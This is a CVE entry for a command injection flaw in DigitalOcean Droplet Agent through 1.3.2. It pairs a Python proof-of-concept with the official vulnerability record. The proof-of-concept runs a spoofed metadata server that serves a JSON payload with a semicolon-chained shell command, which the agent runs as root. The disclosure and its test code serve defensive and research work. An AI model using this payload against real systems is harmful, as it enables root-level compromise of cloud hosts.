CVE-2026-24516

import json from http.server import HTTPServer, BaseHTTPRequestHandler # Malicious payload structure targeting the vulnerability # The agent validates the 'artifact' key but fails to sanitize the 'command' key. payload = { "TroubleshootingAgent": { "Requesting": [ { # This artifact must be present in the validInvestigationArtifacts map "artifact": "kernel_logs", # The command injection occurs here. The agent executes this directly. # Using a semicolon to chain commands. "command": "cat /var/log/syslog; echo 'CVE-2026-24516 POC' > /tmp/pwned.txt" } ] } } class MetadataServer(BaseHTTPRequestHandler): """Simulates a malicious metadata service.""" def do_GET(self): if self.path == '/metadata/v1.json': self.send_response(200) self.send_header('Content-type', 'application/json') self.end_headers() self.wfile.write(json.dumps(payload).encode()) print("[+] Sent malicious payload to Droplet Agent") else: self.send_response(404) if __name__ == '__main__': # In a real attack, the attacker would need to spoof 169.254.169.254 # or intercept the traffic. This server is for demonstration. server = HTTPServer(('0.0.0.0', 80), MetadataServer) print("[*] Malicious Metadata Server running...") server.serve_forever()

{"cve": {"id": "CVE-2026-24516", "sourceIdentifier": "[email protected]", "published": "2026-03-23T17:16:37.863", "lastModified": "2026-03-24T15:54:09.400", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A command injection vulnerability exists in DigitalOcean Droplet Agent through 1.3.2. The troubleshooting actioner component (internal/troubleshooting/actioner/actioner.go) processes metadata from the metadata service endpoint and executes commands specified in the TroubleshootingAgent.Requesting array without adequate input validation. While the code validates that artifacts exist in the validInvestigationArtifacts map, it fails to sanitize the actual command content after the \"command:\" prefix. This allows an attacker who can control metadata responses to inject and execute arbitrary OS commands with root privileges. The attack is triggered by sending a TCP packet with specific sequence numbers to the SSH port, which causes the agent to fetch metadata from http://169.254.169.254/metadata/v1.json. The vulnerability affects the command execution flow in internal/troubleshooting/actioner/actioner.go (insufficient validation), internal/troubleshooting/command/exec.go (direct exec.CommandContext call), and internal/troubleshooting/command/command.go (command parsing without sanitization). This can lead to complete system compromise, data exfiltration, privilege escalation, and potential lateral movement across cloud infrastructure."}, {"lang": "es", "value": "Una vulnerabilidad de inyección de comandos existe en DigitalOcean Droplet Agent hasta la versión 1.3.2. El componente de acción de resolución de problemas (internal/troubleshooting/actioner/actioner.go) procesa metadatos del endpoint del servicio de metadatos y ejecuta comandos especificados en el array TroubleshootingAgent.Requesting sin una validación de entrada adecuada. Si bien el código valida que los artefactos existen en el mapa validInvestigationArtifacts, no logra sanear el contenido real del comando después del prefijo 'command:'. Esto permite a un atacante que puede controlar las respuestas de metadatos inyectar y ejecutar comandos arbitrarios del sistema operativo con privilegios de root. El ataque se desencadena enviando un paquete TCP con números de secuencia específicos al puerto SSH, lo que hace que el agente obtenga metadatos de http://169.254.169.254/metadata/v1.json. La vulnerabilidad afecta el flujo de ejecución de comandos en internal/troubleshooting/actioner/actioner.go (validación insuficiente), internal/troubleshooting/command/exec.go (llamada directa a exec.CommandContext) y internal/troubleshooting/command/command.go (análisis de comandos sin sanitización). Esto puede llevar a un compromiso completo del sistema, exfiltración de datos, escalada de privilegios y potencial movimiento lateral a través de la infraestructura en la nube."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://github.com/digitalocean/droplet-agent/blob/main/internal/troubleshooting/actioner/actioner.go", "source": "[email protected]"}, {"url": "https://github.com/digitalocean/droplet-agent/blob/main/internal/troubleshooting/command/command.go", "source": "[email protected]"}, {"url": "https://github.com/digitalocean/droplet-agent/blob/main/internal/troubleshooting/command/exec.go", "source": "[email protected]"}, {"url": "https://github.com/poxsky/CVE-2026-24516-DigitalOcean-RCE", "source": "[email protected]"}]}}